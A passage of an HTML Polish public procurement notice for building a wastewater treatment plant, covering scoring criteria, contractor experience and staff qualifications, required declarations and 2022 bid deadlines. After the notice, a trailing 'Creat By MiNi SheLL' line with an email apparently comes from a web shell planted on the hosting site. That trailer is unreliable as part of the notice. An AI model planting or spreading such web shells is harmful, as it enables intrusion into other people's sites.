przez ofertę stanowić będzie sumę punktów przyznanych w ramach wszystkich kryteriów.<br/>Zamawiający dokonana oceny złożonych ofert na podstawie danych podanych przez Wykonawcę w Formularzu Ofertowym stanowiącym załącznik nr 2 do SWZ.<br/>Wyniki wszystkich powyższych obliczeń Zamawiający zaokrągli do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na cały zakres zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/> zdolności technicznej lub zawodowej:<br/>1) Wykonawca musi wykazać, iż w okresie ostatnich pięciu lat (liczonych wstecz od dnia w którym upływa termin składania ofert), a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej jedną robotę budowlaną o podobnym charakterze i zakresie tj. polegającą na budowie/odbudowie/rozbudowie/nadbudowie oczyszczalni ścieków, o wartości nie mniejszej niż 4.000.000,00 zł. brutto.<br/>Przez jedną robotę budowlaną Zamawiający rozumie zamówienie wykonane w ramach jednej umowy.<br/>W przypadku gdy w wykazie robót budowlanych przedstawionym przez Wykonawcę rozliczenie między Wykonawcą a Zamawiającym za wykonane zamówienie zostało do-konane w innej walucie niż w złotych polskich, Zamawiający (do celu oceny oferty) do-kona przeliczenia wartości wykonanych zamówień w innej walucie niż złoty polski na podstawie średniego kursu złotego w stosunku do walut obcych określonego w tabeli kursów średnich walut obcych Narodowego Banku Polskiego (http://www.nbp.pl) na dzień ogłoszenia niniejszego postępowania. Jeżeli w tym dniu nie będzie opublikowana tabela kursów średnich walut obcych Narodowego Banku Polskiego, Zamawiający przyjmie kurs średni z ostatniej tabeli przed wszczęciem postępowania.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wy-konywanych wspólnie z innymi Wykonawcami wykaz robót budowlanych dotyczy ro-bót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>2) Wykonawca musi wykazać, że dysponuje lub będzie dysponował w okresie realizacji zamówienia osobami zdolnymi do wykonania zamówienia, posiadającymi odpowiednie wykształcenie, kwalifikacje zawodowe i doświadczenie, które skieruje do wykonania zamówienia tj.:<br/>a) projektantem posiadającym uprawnienia do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz posiada minimum 5-letnie doświadczenie zawodowe po uzyskaniu uprawnień do projektowania w specjalności konstrukcyjno-budowlanej<br/>b) kierownikiem budowy, który posiada uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz posiada minimum 5-letnie doświadczenie zawodowe po uzyskaniu uprawnień budowlanych na stanowisku kierownika budowy w specjalności konstrukcyjno-budowlanej<br/>Osoby przewidziane do pełnienia samodzielnych funkcji technicznych w budownictwie mu-szą posiadać wymagane uprawnienia, które zostały wydane zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2019 r. poz. 1186) oraz zgodnie z Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r. poz. 831) lub odpowiadające im ważne uprawnienia bu-dowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów bądź odpowiadające im uprawnienia wydane obywatelom państw członkowskich Unii Europej-skiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA), których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifi-kacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz. 65).<br/>Oceniając zdolność techniczną lub zawodową Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności za-angażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na rea-lizację zamówienia.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodo-wych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie za-mówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołą-czają do oferty oświadczenie, z którego wynika, które roboty budowlane wyko-nają poszczególni Wykonawcy (wzór stanowi załącznik nr 10 do SWZ). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">4. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie 5 lat, a jeże-li okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz któ-rych roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o któ-rych mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przy-czyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Wykaz robót budowlanych należy sporządzić na pod-stawie wzoru stanowiącego załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Informacji z Krajowego Rejestru Karnego w zakresie art. 108 ust. 1 pkt 1 i 2 Pzp, w zakresie art. 108 ust. 1 pkt 4 Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego – sporządzonej nie wcze-śniej niż 6 miesięcy przed jej złożeniem.<br/>2. Oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Pzp, o braku przyna-leżności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z in-nym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwier-dzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postepowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej (wzór oświadczenia stanowi zał. nr 5 do SWZ).<br/>3. Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp, w zakresie podstaw wykluczenia z postę-powania wskazanych przez Zamawiającego, o których mowa w: art. 108 ust. 1 pkt 3 Pzp, art. 108 ust. 1 pkt 4 Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, art. 108 ust. 1 pkt 5 Pzp, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji, art. 108 ust. 1 pkt 6 Pzp (wzór oświadczenia sta-nowi zał. nr 6 do SWZ).<br/>5. Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia pu-blicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę ja-kości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbęd-nych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osoba-mi. Wykaz osób należy sporządzić na podstawie wzoru stanowiącego załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 8. Do oferty należy dołączyć:<br/>8.1. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania – odpis lub informację z Krajowego Rejestru Sądowego, Cen-tralnej Ewidencji i informacji o Działalności Gospodarczej lub innego właściwego reje-stru.<br/>8.2. Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezento-wania nie wynika z dokumentów, o których mowa w pkt 8.1. – pełnomocnictwo lub inny dokument (np. akt powołania na stanowisko prezesa zarządu, członka zarządu spółki lub, w przypadku spółek działających w systemie common law, członka rady dyrekto-rów spółki, a także umowa spółki cywilnej lub uchwała jej wspólników, wskazująca jed-nego ze wspólników jako umocowanego do reprezentacji spółki) potwierdzający umo-cowanie do reprezentowania Wykonawcy.<br/>8.3. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wyko-nawców wspólnie ubiegających się o udzielenie zamówienia – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>8.4. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania o udzielenie zamówienia oraz o spełnianiu warunków udziału w postępowaniu – wzór oświadczenia o niepodleganiu wykluczeniu stanowi Załącznik nr 3 do SWZ. W przypad-ku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepod-leganiu wykluczeniu i spełnianiu warunków udziału składa każdy z Wykonawców. W przypadku polegania na zdolnościach podmiotów udostępniających zasoby Wykonaw-ca przedstawia wraz z oświadczeniem, o którym mowa w art. 125 ust. 1 Pzp, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wyklu-czenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowa-niu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/>8.5. Oświadczenie na podstawie art. 117 ust. 4 ustawy Pzp – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (wzór stanowi załącznik nr 10 do SWZ).<br/>8.6. Zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dys-pozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny pod-miotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, bę-dzie dysponował niezbędnymi zasobami tych podmiotów – dotyczy Wykonawcy, który polega na zdolnościach technicznych lub zawodowych podmiotu udostępniającego za-soby (wzór stanowi zał. nr 9 do SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z treścią SWZ oraz załącznikiem nr 4 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-23 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">przekazywanie oferty oraz dokumentów i oświadczeń składanych wraz z ofertą, odbywa się przy użyciu MiniPortalu https://miniportal.uzp.gov.pl, ePUAPu https://epuap.gov.pl/wps/portal (za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez MiniPortal - Formularze do komunikacji -&gt; Formularz do złożenia, zmiany, wycofania oferty lub wniosku),</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-23 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com